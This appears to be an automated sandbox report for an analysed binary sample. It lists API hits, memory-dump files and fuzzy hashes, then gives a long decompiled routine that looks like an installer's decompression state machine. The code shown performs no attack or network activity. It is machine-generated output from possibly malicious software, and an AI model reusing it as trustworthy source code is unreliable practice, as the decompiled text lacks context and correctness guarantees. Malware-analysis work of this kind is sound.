                                  0x0040292e
                                  0x0040292e
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: FileFindFirst
                                  • String ID:
                                  • API String ID: 1974802433-0
                                  • Opcode ID: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
                                  • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                  • Opcode Fuzzy Hash: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
                                  • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E00406D85(signed int __ebx, signed int* __esi) {
                                  				signed int _t396;
                                  				signed int _t425;
                                  				signed int _t442;
                                  				signed int _t443;
                                  				signed int* _t446;
                                  				void* _t448;
                                  
                                  				L0:
                                  				while(1) {
                                  					L0:
                                  					_t446 = __esi;
                                  					_t425 = __ebx;
                                  					if( *(_t448 - 0x34) == 0) {
                                  						break;
                                  					}
                                  					L55:
                                  					__eax =  *(__ebp - 0x38);
                                  					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                  					__ecx = __ebx;
                                  					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                  					__ebx = __ebx + 8;
                                  					while(1) {
                                  						L56:
                                  						if(__ebx < 0xe) {
                                  							goto L0;
                                  						}
                                  						L57:
                                  						__eax =  *(__ebp - 0x40);
                                  						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                  						__ecx = __eax;
                                  						__esi[1] = __eax;
                                  						__ecx = __eax & 0x0000001f;
                                  						if(__cl > 0x1d) {
                                  							L9:
                                  							_t443 = _t442 | 0xffffffff;
                                  							 *_t446 = 0x11;
                                  							L10:
                                  							_t446[0x147] =  *(_t448 - 0x40);
                                  							_t446[0x146] = _t425;
                                  							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                  							L11:
                                  							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                  							_t446[0x26ea] =  *(_t448 - 0x30);
                                  							E004074F4( *(_t448 + 8));
                                  							return _t443;
                                  						}
                                  						L58:
                                  						__eax = __eax & 0x000003e0;
                                  						if(__eax > 0x3a0) {
                                  							goto L9;
                                  						}
                                  						L59:
                                  						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                  						__ebx = __ebx - 0xe;
                                  						_t94 =  &(__esi[2]);
                                  						 *_t94 = __esi[2] & 0x00000000;
                                  						 *__esi = 0xc;
                                  						while(1) {
                                  							L60:
                                  							__esi[1] = __esi[1] >> 0xa;
                                  							__eax = (__esi[1] >> 0xa) + 4;
                                  							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                  								goto L68;
                                  							}
                                  							L61:
                                  							while(1) {
                                  								L64:
                                  								if(__ebx >= 3) {
                                  									break;
                                  								}
                                  								L62:
                                  								if( *(__ebp - 0x34) == 0) {
                                  									goto L182;
                                  								}
                                  								L63:
                                  								__eax =  *(__ebp - 0x38);
                                  								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                  								__ecx = __ebx;
                                  								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                  								__ebx = __ebx + 8;
                                  							}
                                  							L65:
                                  							__ecx = __esi[2];
                                  							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                  							__ebx = __ebx - 3;
                                  							_t108 = __ecx + 0x4084d4; // 0x121110
                                  							__ecx =  *_t108;
                                  							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                  							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                  							__ecx = __esi[1];
                                  							__esi[2] = __esi[2] + 1;
                                  							__eax = __esi[2];
                                  							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                  							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                  								goto L64;
                                  							}
                                  							L66:
                                  							while(1) {
                                  								L68:
                                  								if(__esi[2] >= 0x13) {
                                  									break;
                                  								}
                                  								L67:
                                  								_t119 = __esi[2] + 0x4084d4; // 0x4000300
                                  								__eax =  *_t119;
                                  								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                  								_t126 =  &(__esi[2]);
                                  								 *_t126 = __esi[2] + 1;
                                  							}
                                  							L69:
                                  							__ecx = __ebp - 8;
                                  							__edi =  &(__esi[0x143]);
                                  							 &(__esi[0x148]) =  &(__esi[0x144]);
                                  							__eax = 0;
                                  							 *(__ebp - 8) = 0;
                                  							__eax =  &(__esi[3]);
                                  							 *__edi = 7;
                                  							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                  							if(__eax != 0) {
                                  								L72:
                                  								 *__esi = 0x11;
                                  								while(1) {
                                  									L180:
                                  									_t396 =  *_t446;
                                  									if(_t396 > 0xf) {
                                  										break;
                                  									}
                                  									L1:
                                  									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
                                  										case 0:
                                  											L101:
                                  											__eax = __esi[4] & 0x000000ff;
                                  											__esi[3] = __esi[4] & 0x000000ff;
                                  											__eax = __esi[5];
                                  											__esi[2] = __esi[5];
                                  											 *__esi = 1;
                                  											goto L102;
                                  										case 1:
                                  											L102:
                                  											__eax = __esi[3];
                                  											while(1) {
                                  												L105:
                                  												__eflags = __ebx - __eax;
                                  												if(__ebx >= __eax) {
                                  													break;
                                  												}
                                  												L103:
                                  												__eflags =  *(__ebp - 0x34);
                                  												if( *(__ebp - 0x34) == 0) {
                                  													goto L182;
                                  												}
                                  												L104:
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                  												__ecx = __ebx;
                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                  												__ebx = __ebx + 8;
                                  												__eflags = __ebx;
                                  											}
                                  											L106:
                                  											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                  											__eax = __eax &  *(__ebp - 0x40);
                                  											__ecx = __esi[2];
                                  											__eax = __esi[2] + __eax * 4;
                                  											__ecx =  *(__eax + 1) & 0x000000ff;
                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                  											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                  											__ecx =  *__eax & 0x000000ff;
                                  											__eflags = __ecx;
                                  											if(__ecx != 0) {
                                  												L108:
                                  												__eflags = __cl & 0x00000010;
                                  												if((__cl & 0x00000010) == 0) {
                                  													L110:
                                  													__eflags = __cl & 0x00000040;
                                  													if((__cl & 0x00000040) == 0) {
                                  														goto L125;
                                  													}
                                  													L111:
                                  													__eflags = __cl & 0x00000020;
                                  													if((__cl & 0x00000020) == 0) {
                                  														goto L9;
                                  													}
                                  													L112:
                                  													 *__esi = 7;
                                  													goto L180;
                                  												}
                                  												L109:
                                  												__esi[2] = __ecx;
                                  												__esi[1] = __eax;
                                  												 *__esi = 2;
                                  												goto L180;
                                  											}
                                  											L107:
                                  											__esi[2] = __eax;
                                  											 *__esi = 6;
                                  											goto L180;
                                  										case 2:
                                  											L113:
                                  											__eax = __esi[2];
                                  											while(1) {
                                  												L116:
                                  												__eflags = __ebx - __eax;
                                  												if(__ebx >= __eax) {
                                  													break;
                                  												}
                                  												L114:
                                  												__eflags =  *(__ebp - 0x34);
                                  												if( *(__ebp - 0x34) == 0) {
                                  													goto L182;
                                  												}
                                  												L115:
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                  												__ecx = __ebx;
                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                  												__ebx = __ebx + 8;
                                  												__eflags = __ebx;
                                  											}
                                  											L117:
                                  											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                  											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                  											__ecx = __eax;
                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                  											__ebx = __ebx - __eax;
                                  											__eflags = __ebx;
                                  											__eax = __esi[4] & 0x000000ff;
                                  											__esi[3] = __esi[4] & 0x000000ff;
                                  											__eax = __esi[6];
                                  											__esi[2] = __esi[6];
                                  											 *__esi = 3;
                                  											goto L118;
                                  										case 3:
                                  											L118:
                                  											__eax = __esi[3];
                                  											while(1) {
                                  												L121:
                                  												__eflags = __ebx - __eax;
                                  												if(__ebx >= __eax) {
                                  													break;
                                  												}
                                  												L119:
                                  												__eflags =  *(__ebp - 0x34);
                                  												if( *(__ebp - 0x34) == 0) {
                                  													goto L182;
                                  												}
                                  												L120:
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                  												__ecx = __ebx;
                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                  												__ebx = __ebx + 8;
                                  												__eflags = __ebx;
                                  											}
                                  											L122:
                                  											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                  											__eax = __eax &  *(__ebp - 0x40);
                                  											__ecx = __esi[2];
                                  											__eax = __esi[2] + __eax * 4;
                                  											__ecx =  *(__eax + 1) & 0x000000ff;
                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                  											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                  											__ecx =  *__eax & 0x000000ff;
                                  											__eflags = __cl & 0x00000010;
                                  											if((__cl & 0x00000010) == 0) {
                                  												L124:
                                  												__eflags = __cl & 0x00000040;
                                  												if((__cl & 0x00000040) != 0) {
                                  													goto L9;
                                  												}
                                  												L125:
                                  												__esi[3] = __ecx;
                                  												__ecx =  *(__eax + 2) & 0x0000ffff;
                                  												__esi[2] = __eax;
                                  												goto L180;
                                  											}
                                  											L123:
                                  											__esi[2] = __ecx;
                                  											__esi[3] = __eax;
                                  											 *__esi = 4;
                                  											goto L180;
                                  										case 4:
                                  											L126:
                                  											__eax = __esi[2];
                                  											while(1) {
                                  												L129:
                                  												__eflags = __ebx - __eax;
                                  												if(__ebx >= __eax) {
                                  													break;
                                  												}
                                  												L127:
                                  												__eflags =  *(__ebp - 0x34);
                                  												if( *(__ebp - 0x34) == 0) {
                                  													goto L182;
                                  												}
                                  												L128:
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                  												__ecx = __ebx;
                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                  												__ebx = __ebx + 8;
                                  												__eflags = __ebx;
                                  											}
                                  											L130:
                                  											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                  											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                  											__ecx = __eax;
                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                  											__ebx = __ebx - __eax;
                                  											__eflags = __ebx;
                                  											 *__esi = 5;
                                  											goto L131;
                                  										case 5:
                                  											L131:
                                  											__eax =  *(__ebp - 0x30);
                                  											__edx = __esi[3];
                                  											__eax = __eax - __esi;
                                  											__ecx = __eax - __esi - 0x1ba0;
                                  											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                  											if(__eax - __esi - 0x1ba0 >= __edx) {
                                  												__ecx = __eax;
                                  												__ecx = __eax - __edx;
                                  												__eflags = __ecx;
                                  											} else {
                                  												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                  												__ecx = __esi[0x26e8] - __edx - __esi;
                                  												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                  											}
                                  											__eflags = __esi[1];
                                  											 *(__ebp - 0x20) = __ecx;
                                  											if(__esi[1] != 0) {
                                  												L135:
                                  												__edi =  *(__ebp - 0x2c);
                                  												do {
                                  													L136:
                                  													__eflags = __edi;
                                  													if(__edi != 0) {
                                  														goto L152;
                                  													}
                                  													L137:
                                  													__edi = __esi[0x26e8];
                                  													__eflags = __eax - __edi;
                                  													if(__eax != __edi) {
                                  														L143:
                                  														__esi[0x26ea] = __eax;
                                  														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                  														__eax = __esi[0x26ea];
                                  														__ecx = __esi[0x26e9];
                                  														__eflags = __eax - __ecx;
                                  														 *(__ebp - 0x30) = __eax;
                                  														if(__eax >= __ecx) {
                                  															__edi = __esi[0x26e8];
                                  															__edi = __esi[0x26e8] - __eax;
                                  															__eflags = __edi;
                                  														} else {
                                  															__ecx = __ecx - __eax;
                                  															__edi = __ecx - __eax - 1;
                                  														}
                                  														__edx = __esi[0x26e8];
                                  														__eflags = __eax - __edx;
                                  														 *(__ebp - 8) = __edx;
                                  														if(__eax == __edx) {
                                  															__edx =  &(__esi[0x6e8]);
                                  															__eflags = __ecx - __edx;
                                  															if(__ecx != __edx) {
                                  																__eax = __edx;
                                  																__eflags = __eax - __ecx;
                                  																 *(__ebp - 0x30) = __eax;
                                  																if(__eax >= __ecx) {
                                  																	__edi =  *(__ebp - 8);
                                  																	__edi =  *(__ebp - 8) - __eax;
                                  																	__eflags = __edi;
                                  																} else {
                                  																	__ecx = __ecx - __eax;
                                  																	__edi = __ecx;
                                  																}
                                  															}
                                  														}
                                  														__eflags = __edi;
                                  														if(__edi == 0) {
                                  															goto L183;
                                  														} else {
                                  															goto L152;
                                  														}
                                  													}
                                  													L138:
                                  													__ecx = __esi[0x26e9];
                                  													__edx =  &(__esi[0x6e8]);
                                  													__eflags = __ecx - __edx;
                                  													if(__ecx == __edx) {
                                  														goto L143;
                                  													}
                                  													L139:
                                  													__eax = __edx;
                                  													__eflags = __eax - __ecx;
                                  													if(__eax >= __ecx) {
                                  														__edi = __edi - __eax;
                                  														__eflags = __edi;
                                  													} else {
                                  														__ecx = __ecx - __eax;
                                  														__edi = __ecx;
                                  													}
                                  													__eflags = __edi;
                                  													if(__edi == 0) {
                                  														goto L143;
                                  													}
                                  													L152:
                                  													__ecx =  *(__ebp - 0x20);
                                  													 *__eax =  *__ecx;
                                  													__eax = __eax + 1;
                                  													__ecx = __ecx + 1;
                                  													__edi = __edi - 1;
                                  													__eflags = __ecx - __esi[0x26e8];
                                  													 *(__ebp - 0x30) = __eax;
                                  													 *(__ebp - 0x20) = __ecx;
                                  													 *(__ebp - 0x2c) = __edi;
                                  													if(__ecx == __esi[0x26e8]) {
                                  														__ecx =  &(__esi[0x6e8]);
                                  														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                  													}
                                  													_t357 =  &(__esi[1]);
                                  													 *_t357 = __esi[1] - 1;
                                  													__eflags =  *_t357;
                                  												} while ( *_t357 != 0);
                                  											}
                                  											goto L23;
                                  										case 6:
                                  											L156:
                                  											__eax =  *(__ebp - 0x2c);
                                  											__edi =  *(__ebp - 0x30);
                                  											__eflags = __eax;
                                  											if(__eax != 0) {
                                  												L172:
                                  												__cl = __esi[2];
                                  												 *__edi = __cl;
                                  												__edi = __edi + 1;
                                  												__eax = __eax - 1;
                                  												 *(__ebp - 0x30) = __edi;
                                  												 *(__ebp - 0x2c) = __eax;
                                  												goto L23;
                                  											}
                                  											L157:
                                  											__ecx = __esi[0x26e8];
                                  											__eflags = __edi - __ecx;
                                  											if(__edi != __ecx) {
                                  												L163:
                                  												__esi[0x26ea] = __edi;
                                  												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                  												__edi = __esi[0x26ea];
                                  												__ecx = __esi[0x26e9];
                                  												__eflags = __edi - __ecx;
                                  												 *(__ebp - 0x30) = __edi;
                                  												if(__edi >= __ecx) {
                                  													__eax = __esi[0x26e8];
                                  													__eax = __esi[0x26e8] - __edi;
                                  													__eflags = __eax;
                                  												} else {
                                  													__ecx = __ecx - __edi;
                                  													__eax = __ecx - __edi - 1;
                                  												}
                                  												__edx = __esi[0x26e8];
                                  												__eflags = __edi - __edx;
                                  												 *(__ebp - 8) = __edx;
                                  												if(__edi == __edx) {
                                  													__edx =  &(__esi[0x6e8]);
                                  													__eflags = __ecx - __edx;
                                  													if(__ecx != __edx) {
                                  														__edi = __edx;
                                  														__eflags = __edi - __ecx;
                                  														 *(__ebp - 0x30) = __edi;
                                  														if(__edi >= __ecx) {
                                  															__eax =  *(__ebp - 8);
                                  															__eax =  *(__ebp - 8) - __edi;
                                  															__eflags = __eax;
                                  														} else {
                                  															__ecx = __ecx - __edi;
                                  															__eax = __ecx;
                                  														}
                                  													}
                                  												}
                                  												__eflags = __eax;
                                  												if(__eax == 0) {
                                  													goto L183;
                                  												} else {
                                  													goto L172;
                                  												}
                                  											}
                                  											L158:
                                  											__eax = __esi[0x26e9];
                                  											__edx =  &(__esi[0x6e8]);
                                  											__eflags = __eax - __edx;
                                  											if(__eax == __edx) {
                                  												goto L163;
                                  											}
                                  											L159:
                                  											__edi = __edx;
                                  											__eflags = __edi - __eax;
                                  											if(__edi >= __eax) {
                                  												__ecx = __ecx - __edi;
                                  												__eflags = __ecx;
                                  												__eax = __ecx;
                                  											} else {
                                  												__eax = __eax - __edi;
                                  												__eax = __eax - 1;
                                  											}
                                  											__eflags = __eax;
                                  											if(__eax != 0) {
                                  												goto L172;
                                  											} else {
                                  												goto L163;
                                  											}
                                  										case 7:
                                  											L173:
                                  											__eflags = __ebx - 7;
                                  											if(__ebx > 7) {
                                  												__ebx = __ebx - 8;
                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                  												_t380 = __ebp - 0x38;
                                  												 *_t380 =  *(__ebp - 0x38) - 1;
                                  												__eflags =  *_t380;
                                  											}
                                  											goto L175;
                                  										case 8:
                                  											L4:
                                  											while(_t425 < 3) {
                                  												if( *(_t448 - 0x34) == 0) {
                                  													goto L182;
                                  												} else {
                                  													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                  													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                  													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                  													_t425 = _t425 + 8;
                                  													continue;
                                  												}
                                  											}
                                  											_t425 = _t425 - 3;
                                  											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                  											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                  											asm("sbb ecx, ecx");
                                  											_t408 = _t406 >> 1;
                                  											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                  											if(_t408 == 0) {
                                  												L24:
                                  												 *_t446 = 9;
                                  												_t436 = _t425 & 0x00000007;
                                  												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                  												_t425 = _t425 - _t436;
                                  												goto L180;
                                  											}
                                  											L6:
                                  											_t411 = _t408 - 1;
                                  											if(_t411 == 0) {
                                  												L13:
                                  												__eflags =  *0x432e90;
                                  												if( *0x432e90 != 0) {
                                  													L22:
                                  													_t412 =  *0x40a5e8; // 0x9
                                  													_t446[4] = _t412;
                                  													_t413 =  *0x40a5ec; // 0x5
                                  													_t446[4] = _t413;
                                  													_t414 =  *0x431d0c; // 0x0
                                  													_t446[5] = _t414;
                                  													_t415 =  *0x431d08; // 0x0
                                  													_t446[6] = _t415;
                                  													L23:
                                  													 *_t446 =  *_t446 & 0x00000000;
                                  													goto L180;
                                  												} else {
                                  													_t26 = _t448 - 8;
                                  													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                  													__eflags =  *_t26;
                                  													_t416 = 0x431d10;
                                  													goto L15;
                                  													L20:
                                  													 *_t416 = _t438;
                                  													_t416 = _t416 + 4;
                                  													__eflags = _t416 - 0x432190;
                                  													if(_t416 < 0x432190) {
                                  														L15:
                                  														__eflags = _t416 - 0x431f4c;
                                  														_t438 = 8;
                                  														if(_t416 > 0x431f4c) {
                                  															__eflags = _t416 - 0x432110;
                                  															if(_t416 >= 0x432110) {
                                  																__eflags = _t416 - 0x432170;
                                  																if(_t416 < 0x432170) {
                                  																	_t438 = 7;
                                  																}
                                  															} else {
                                  																_t438 = 9;
                                  															}
                                  														}
                                  														goto L20;
                                  													} else {
                                  														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
                                  														_push(0x1e);
                                  														_pop(_t440);
                                  														_push(5);
                                  														_pop(_t419);
                                  														memset(0x431d10, _t419, _t440 << 2);
                                  														_t450 = _t450 + 0xc;
                                  														_t442 = 0x431d10 + _t440;
                                  														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
                                  														 *0x432e90 =  *0x432e90 + 1;
                                  														__eflags =  *0x432e90;
                                  														goto L22;
                                  													}
                                  												}
                                  											}
                                  											L7:
                                  											_t423 = _t411 - 1;
                                  											if(_t423 == 0) {
                                  												 *_t446 = 0xb;
                                  												goto L180;
                                  											}
                                  											L8:
                                  											if(_t423 != 1) {
                                  												goto L180;
                                  											}
                                  											goto L9;
                                  										case 9:
                                  											while(1) {
                                  												L27:
                                  												__eflags = __ebx - 0x20;
                                  												if(__ebx >= 0x20) {
                                  													break;
                                  												}
                                  												L25:
                                  												__eflags =  *(__ebp - 0x34);
                                  												if( *(__ebp - 0x34) == 0) {
                                  													goto L182;
                                  												}
                                  												L26:
                                  												__eax =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                  												__ecx = __ebx;
                                  												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                  												__ebx = __ebx + 8;
                                  												__eflags = __ebx;
                                  											}
                                  											L28:
                                  											__eax =  *(__ebp - 0x40);
                                  											__ebx = 0;
                                  											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                  											 *(__ebp - 0x40) = 0;
                                  											__eflags = __eax;
                                  											__esi[1] = __eax;
                                  											if(__eax == 0) {
                                  												goto L53;
                                  											}
                                  											L29:
                                  											_push(0xa);
                                  											_pop(__eax);
                                  											goto L54;
                                  										case 0xa:
                                  											L30:
                                  											__eflags =  *(__ebp - 0x34);
                                  											if( *(__ebp - 0x34) == 0) {
                                  												goto L182;
                                  											}
                                  											L31:
                                  											__eax =  *(__ebp - 0x2c);
                                  											__eflags = __eax;
                                  											if(__eax != 0) {
                                  												L48:
                                  												__eflags = __eax -  *(__ebp - 0x34);
                                  												if(__eax >=  *(__ebp - 0x34)) {
                                  													__eax =  *(__ebp - 0x34);
                                  												}
                                  												__ecx = __esi[1];
                                  												__eflags = __ecx - __eax;
                                  												__edi = __ecx;
                                  												if(__ecx >= __eax) {
                                  													__edi = __eax;
                                  												}
                                  												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                  												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                  												_t80 =  &(__esi[1]);
                                  												 *_t80 = __esi[1] - __edi;
                                  												__eflags =  *_t80;
                                  												if( *_t80 == 0) {
                                  													L53:
                                  													__eax = __esi[0x145];
                                  													L54:
                                  													 *__esi = __eax;
                                  												}
                                  												goto L180;
                                  											}
                                  											L32:
                                  											__ecx = __esi[0x26e8];
                                  											__edx =  *(__ebp - 0x30);
                                  											__eflags = __edx - __ecx;
                                  											if(__edx != __ecx) {
                                  												L38:
                                  												__esi[0x26ea] = __edx;
                                  												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                  												__edx = __esi[0x26ea];
                                  												__ecx = __esi[0x26e9];
                                  												__eflags = __edx - __ecx;
                                  												 *(__ebp - 0x30) = __edx;
                                  												if(__edx >= __ecx) {
                                  													__eax = __esi[0x26e8];
                                  													__eax = __esi[0x26e8] - __edx;
                                  													__eflags = __eax;
                                  												} else {
                                  													__ecx = __ecx - __edx;
                                  													__eax = __ecx - __edx - 1;
                                  												}
                                  												__edi = __esi[0x26e8];
                                  												 *(__ebp - 0x2c) = __eax;
                                  												__eflags = __edx - __edi;
                                  												if(__edx == __edi) {
                                  													__edx =  &(__esi[0x6e8]);
                                  													__eflags = __edx - __ecx;
                                  													if(__eflags != 0) {
                                  														 *(__ebp - 0x30) = __edx;
                                  														if(__eflags >= 0) {
                                  															__edi = __edi - __edx;
                                  															__eflags = __edi;
                                  															__eax = __edi;
                                  														} else {
                                  															__ecx = __ecx - __edx;
                                  															__eax = __ecx;
                                  														}
                                  														 *(__ebp - 0x2c) = __eax;
                                  													}
                                  												}
                                  												__eflags = __eax;
                                  												if(__eax == 0) {
                                  													goto L183;
                                  												} else {
                                  													goto L48;
                                  												}
                                  											}
                                  											L33:
                                  											__eax = __esi[0x26e9];
                                  											__edi =  &(__esi[0x6e8]);
                                  											__eflags = __eax - __edi;
                                  											if(__eax == __edi) {
                                  												goto L38;
                                  											}
                                  											L34:
                                  											__edx = __edi;
                                  											__eflags = __edx - __eax;
                                  											 *(__ebp - 0x30) = __edx;
                                  											if(__edx >= __eax) {
                                  												__ecx = __ecx - __edx;
                                  												__eflags = __ecx;
                                  												__eax = __ecx;
                                  											} else {
                                  												__eax = __eax - __edx;
                                  												__eax = __eax - 1;
                                  											}
                                  											__eflags = __eax;
                                  											 *(__ebp - 0x2c) = __eax;
                                  											if(__eax != 0) {
                                  												goto L48;
                                  											} else {
                                  												goto L38;
                                  											}
                                  										case 0xb:
                                  											goto L56;
                                  										case 0xc:
                                  											L60:
                                  											__esi[1] = __esi[1] >> 0xa;
                                  											__eax = (__esi[1] >> 0xa) + 4;
                                  											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                  												goto L68;
                                  											}
                                  											goto L61;
                                  										case 0xd:
                                  											while(1) {
                                  												L93:
                                  												__eax = __esi[1];
                                  												__ecx = __esi[2];
                                  												__edx = __eax;
                                  												__eax = __eax & 0x0000001f;
                                  												__edx = __edx >> 5;
                                  												__eax = __edx + __eax + 0x102;
                                  												__eflags = __esi[2] - __eax;
                                  												if(__esi[2] >= __eax) {
                                  													break;
                                  												}
                                  												L73:
